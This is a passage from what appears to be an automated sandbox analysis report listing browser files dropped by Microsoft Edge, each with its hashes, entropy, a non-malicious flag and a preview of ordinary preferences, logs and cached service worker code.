                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380903748641376","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3d61d.TMP (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):13579
                                                                                                                                                                Entropy (8bit):5.2294340074227135
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:st/J99QTryDigabatSuypBsHsHyaNP9kpSYCBKs8IbV+FmWQwW9ZPoYJ:st/PGKSu4BsMHtJ7bGnQwI
                                                                                                                                                                MD5:8CFF09EAA1EE613FDE28851350D9577B
                                                                                                                                                                SHA1:E95C2F3DE45FD2EEF8DB9FB37C84631CD971E999
                                                                                                                                                                SHA-256:1B209DFBC00A17350B5253337E8D975D5F21065A955325279ECB4F9D8341C052
                                                                                                                                                                SHA-512:8A2FADED12FE3F1E38E65039B647C13BD40ACDDA214E9BE8E5228EA401A6EA642A7FF8CE06BEAF66D8A2A617C0C8AFE67BA5558162EB4ACD54030B55DA249DAE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380903748641376","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):35113
                                                                                                                                                                Entropy (8bit):5.555704209770109
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:iR2bPnpWP7Pf4h8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPhGXfrwIK0WuqKpQtuj:iR2bPnpWP7Pf4hu1ja+kXsIK0Wr1tE
                                                                                                                                                                MD5:4DA99C2332B3CB18AB31DBFF80EB9E77
                                                                                                                                                                SHA1:0F77BB1A1925E717C4BF499ADE5828FE1572D2C2
                                                                                                                                                                SHA-256:04C73F86469A3B2EB3A97424C9E18A480BF52E0516F00B9C11E146B01A1BF1F2
                                                                                                                                                                SHA-512:5CC6E48D9614601B23C60B87E0967164263FE7CBD019AC7B255C7E81385E28722221F1A516E6F325084E6036DFF4189A1F31C68D9869EAC24B570837C7D4600F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380903748127814","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380903748127814","location":5,"ma

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF38c24.TMP (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):35113
                                                                                                                                                                Entropy (8bit):5.555704209770109
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:iR2bPnpWP7Pf4h8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPhGXfrwIK0WuqKpQtuj:iR2bPnpWP7Pf4hu1ja+kXsIK0Wr1tE
                                                                                                                                                                MD5:4DA99C2332B3CB18AB31DBFF80EB9E77
                                                                                                                                                                SHA1:0F77BB1A1925E717C4BF499ADE5828FE1572D2C2
                                                                                                                                                                SHA-256:04C73F86469A3B2EB3A97424C9E18A480BF52E0516F00B9C11E146B01A1BF1F2
                                                                                                                                                                SHA-512:5CC6E48D9614601B23C60B87E0967164263FE7CBD019AC7B255C7E81385E28722221F1A516E6F325084E6036DFF4189A1F31C68D9869EAC24B570837C7D4600F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380903748127814","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380903748127814","location":5,"ma

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16
                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2394
                                                                                                                                                                Entropy (8bit):5.817571625143444
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:F2emPMrd6/fBkYrdey0dyrd6aBkJrdcBkn:F1mPMx6/GYxyyx6JJxrn
                                                                                                                                                                MD5:B63208F12D122BD6D9F45BA1BD314C58
                                                                                                                                                                SHA1:241CBAA858E0DBC21E1C730E5DDB2B89AE8459E1
                                                                                                                                                                SHA-256:029D79536DF167CBF6E7902FAFA4B7946BF1417D2ECEB224EC98CFE06B4D75DC
                                                                                                                                                                SHA-512:379D1C1FC827B4F1401F6CD4AFDC6966F11FE5BA3552A65A2DE7E1071B555B9A606B1F10BD29AEE7FB8590983B718BADDA989C70F9CCFD12C6E611DB61BDA53B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2.#...................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true .(.0.8......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmpt

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16
                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):305
                                                                                                                                                                Entropy (8bit):5.1708995202464365
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvRJ4RM1cNwi23oH+TcwtE/a252KLl5vRJdq2PcNwi23oH+TcwtE/a2ZIFUv:7Pc2ZYeb8xLTdvLZYeb8J2FUv
                                                                                                                                                                MD5:122549699760F3B7262DA7447E94322A
                                                                                                                                                                SHA1:F3A160B858DF0D82268D3DB3C64FFCE79BB26DE6
                                                                                                                                                                SHA-256:3BEC7961CC1756BFCB5BD0A43F574851D1DA2CA1F548CCD31E9790B6BB808CEA
                                                                                                                                                                SHA-512:AC572DF7101E160070BC6D8AE399818B9CE1C64897BB5F3A076B1E1F1937AFC0A6845B8473ABE642B6263EDA3D1F02B7BA050DA9465E57F9492F0F3F0D678E6D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:37.970 10e4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2025/01/09-08:42:37.993 10e4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):41
                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):115804
                                                                                                                                                                Entropy (8bit):5.576914201397461
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:sU906yxPXfOxr1lhCe1nL/ImL/rBZXJCjPXNt4newXRvVhu:B9LyxPXfOxr1lMe1nL/5L/TXJ6LwXRvu
                                                                                                                                                                MD5:860AB9553B8AA0E55F1F79A86E887CC8
                                                                                                                                                                SHA1:A44B995E5E1B72FE38FFDCF3AF3435835C7E0B69
                                                                                                                                                                SHA-256:3BCE20B13145CAFD659918FDF50C8308E7E5450BC81D0EFE8759439FCB3D237E
                                                                                                                                                                SHA-512:E28E6F13B08B2ABDAFE6B6527E317916640438954C4925E45CF512AE075B3A0986791705A5AA27DB4F663920D08B22D790DC6CAE5925602ED87B053F86775544
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):190385
                                                                                                                                                                Entropy (8bit):6.389317422333842
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3072:0tmDGYw3Tch5jwWyNVOUa/L/sh97/cGSdkGCgXOVXCagX:ZXjwjgUOL/sdudWdyh
                                                                                                                                                                MD5:84E20CE9A144AEFE34C0A94AED1733A5
                                                                                                                                                                SHA1:4784134A7E0697BF29169BF0FFEE6DF30453EED1
                                                                                                                                                                SHA-256:1A6C602D6292667385A9CB36A988DC8ACBC000B6399E2CE237C10226D86D1F62
                                                                                                                                                                SHA-512:A2AFDD194F7887F3725CB823B77CE563A815324C43D49AE7B4898C966C3174EE377994AECEB6040C933D6F17C168EE228DF0273D2559909DAD4AA1C5461C7EB0
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:0\r..m..........rSG.....0....z3.................;o....x.X........,T.8..`,.....L`.....,T...`......L`......Rc........exports...Rc..yS....module....Rc.3J.....define....Rb.K......amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H........Q.....-${...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da.....d...,T.`.`z.....L`..........a............a.........Dr8..............

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):24
                                                                                                                                                                Entropy (8bit):2.1431558784658327
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:m+l:m
                                                                                                                                                                MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:0\r..m..................

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):72
                                                                                                                                                                Entropy (8bit):3.5376346459829513
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:ij9TXl/l+/l9/lxEstllW/lENix:ipjqOsEEA
                                                                                                                                                                MD5:1A4F6B6EF85A9E6FCBDD77922FC1BDE2
                                                                                                                                                                SHA1:CF9A1A94CE7F1761E75BB41FBA3F1E431301B32B
                                                                                                                                                                SHA-256:29A39F054A0E3E0AAD2B74E7614C1D45C34F85EFBE77D87E894FAA3419EA88A0
                                                                                                                                                                SHA-512:6DD1C5A650B30F9520CE3F2143E4ECA2F83619361778A9AD85C198BA996EDD831524F12A75F31EA074766A8196EFBFFED4C859B365AD8EE59E9B8FF93EA0138F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:@...WNRroy retne.........................X....,..................Ko./.

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):72
                                                                                                                                                                Entropy (8bit):3.5376346459829513
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:ij9TXl/l+/l9/lxEstllW/lENix:ipjqOsEEA
                                                                                                                                                                MD5:1A4F6B6EF85A9E6FCBDD77922FC1BDE2
                                                                                                                                                                SHA1:CF9A1A94CE7F1761E75BB41FBA3F1E431301B32B
                                                                                                                                                                SHA-256:29A39F054A0E3E0AAD2B74E7614C1D45C34F85EFBE77D87E894FAA3419EA88A0
                                                                                                                                                                SHA-512:6DD1C5A650B30F9520CE3F2143E4ECA2F83619361778A9AD85C198BA996EDD831524F12A75F31EA074766A8196EFBFFED4C859B365AD8EE59E9B8FF93EA0138F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:@...WNRroy retne.........................X....,..................Ko./.

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF395f8.TMP (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):72
                                                                                                                                                                Entropy (8bit):3.5376346459829513
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:ij9TXl/l+/l9/lxEstllW/lENix:ipjqOsEEA
                                                                                                                                                                MD5:1A4F6B6EF85A9E6FCBDD77922FC1BDE2
                                                                                                                                                                SHA1:CF9A1A94CE7F1761E75BB41FBA3F1E431301B32B
                                                                                                                                                                SHA-256:29A39F054A0E3E0AAD2B74E7614C1D45C34F85EFBE77D87E894FAA3419EA88A0
                                                                                                                                                                SHA-512:6DD1C5A650B30F9520CE3F2143E4ECA2F83619361778A9AD85C198BA996EDD831524F12A75F31EA074766A8196EFBFFED4C859B365AD8EE59E9B8FF93EA0138F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:@...WNRroy retne.........................X....,..................Ko./.

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):5611
                                                                                                                                                                Entropy (8bit):3.422463865877326
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:W996Dno6n7pzMUpmV+KtVPVX2J67Z/uh9Xp+e+Vijb9hLl9iSrk1mZZvj1Js6N:DDo6n7pzMU0V+KtVPVX2Jhh9Xp+eKijb
                                                                                                                                                                MD5:5701DC3A713B89C3A82C496AFF6CC14F
                                                                                                                                                                SHA1:AE4DB8214814B7EC01D4F1CB28B3EEE5735BE9DE
                                                                                                                                                                SHA-256:BEEFAD35325CB87C599FEF04A022BFCACF940D1F3260BE601504CEE8412E2A7F
                                                                                                                                                                SHA-512:B1D85FBCF412519A03E0ABD26EC8664DC002B86FFBD0EA8A28D485ED0F051DE284A952504E4F85BB15A8C71C42800CA2FC74B2020CA15248CC5A2ED4DD5BEBB4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f..................b................next-map-id.1.Cnamespace-12804e10_9ef4_4e57_b28a_149d80fec363-https://ntp.msn.com/.0haC..................map-0-shd_sweeper.({.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.1.s.w.-.c.c.-.c.a.l.f.e.e.d.i.,.a.d.s.-.m.g.-.c.b.4.2.-.9.5.0.,.a.d.s.-.c.b.v.4.2.-.9.5.0.,.c.-.p.r.g.-.m.s.n.-.s.b.i.d.m.,.p.n.p.w.x.e.x.p.i.r.e.1.8.0.,.p.r.g.-.1.s.w.-.s.a.q.o.o.m.a.n.n.4.t.2.,.p.r.g.-.1.s.w.-.s.a.g.e.i.m.c.o.u.n.t.1.,.p.r.g.-.1.s.w.-.s.a.l.i.k.e.c.o.m.m.e.n.t.t.2.,.1.s.-.w.p.o.-.p.r.1.-.c.t.t.u.,.p.r.g.-.a.d.s.p.e.e.k.,.p.r.g.-.p.r.2.-.w.i.d.g.e.t.-.t.a.b.,.t.r.a.f.f.i.c.-.t.r.a.n.-.n.y.-.t.,.p.r.g.-.p.2.-.l.d.n.y.-.t.r.a.n.s.i.t.,.p.r.g.-.p.2.-.t.r.a.n.-.t.r.d.,.b.t.i.e.-.b.i.d.s.c.a.l.i.n.g.1.-.

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):327
                                                                                                                                                                Entropy (8bit):5.161073738660063
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvREgcT3lyq2PcNwi23oH+TcwtrQMxIFUtJvREgcdHj1ZmwPvREy1RkwOcNwiE:7mZTVyvLZYebCFUtEZD/Sy1R54ZYebtJ
                                                                                                                                                                MD5:DB991819E8E029E0AFBA56CFAC0F6C18
                                                                                                                                                                SHA1:B96C7CE315FBEC316EBAA184D69DC95431E17993
                                                                                                                                                                SHA-256:096AA647CD62AA329AC680A91A02607D463343B858EA62C219D4E0262D8EF7DD
                                                                                                                                                                SHA-512:D4907D6484D33C15F33812A94CE2871E7C849AF68AFCBFB990FC65D2CD328306F1E1EC5342F43AFB0B8190C1AC3E0CA90BBEA30804DA2824A22FAD88712FFE78
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:29.196 770 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/09-08:42:29.198 770 Recovering log #3.2025/01/09-08:42:29.201 770 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):327
                                                                                                                                                                Entropy (8bit):5.161073738660063
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvREgcT3lyq2PcNwi23oH+TcwtrQMxIFUtJvREgcdHj1ZmwPvREy1RkwOcNwiE:7mZTVyvLZYebCFUtEZD/Sy1R54ZYebtJ
                                                                                                                                                                MD5:DB991819E8E029E0AFBA56CFAC0F6C18
                                                                                                                                                                SHA1:B96C7CE315FBEC316EBAA184D69DC95431E17993
                                                                                                                                                                SHA-256:096AA647CD62AA329AC680A91A02607D463343B858EA62C219D4E0262D8EF7DD
                                                                                                                                                                SHA-512:D4907D6484D33C15F33812A94CE2871E7C849AF68AFCBFB990FC65D2CD328306F1E1EC5342F43AFB0B8190C1AC3E0CA90BBEA30804DA2824A22FAD88712FFE78
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:29.196 770 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/09-08:42:29.198 770 Recovering log #3.2025/01/09-08:42:29.201 770 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13380903750626109

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1443
                                                                                                                                                                Entropy (8bit):3.7749415596969
                                                                                                                                                                Encrypted:false
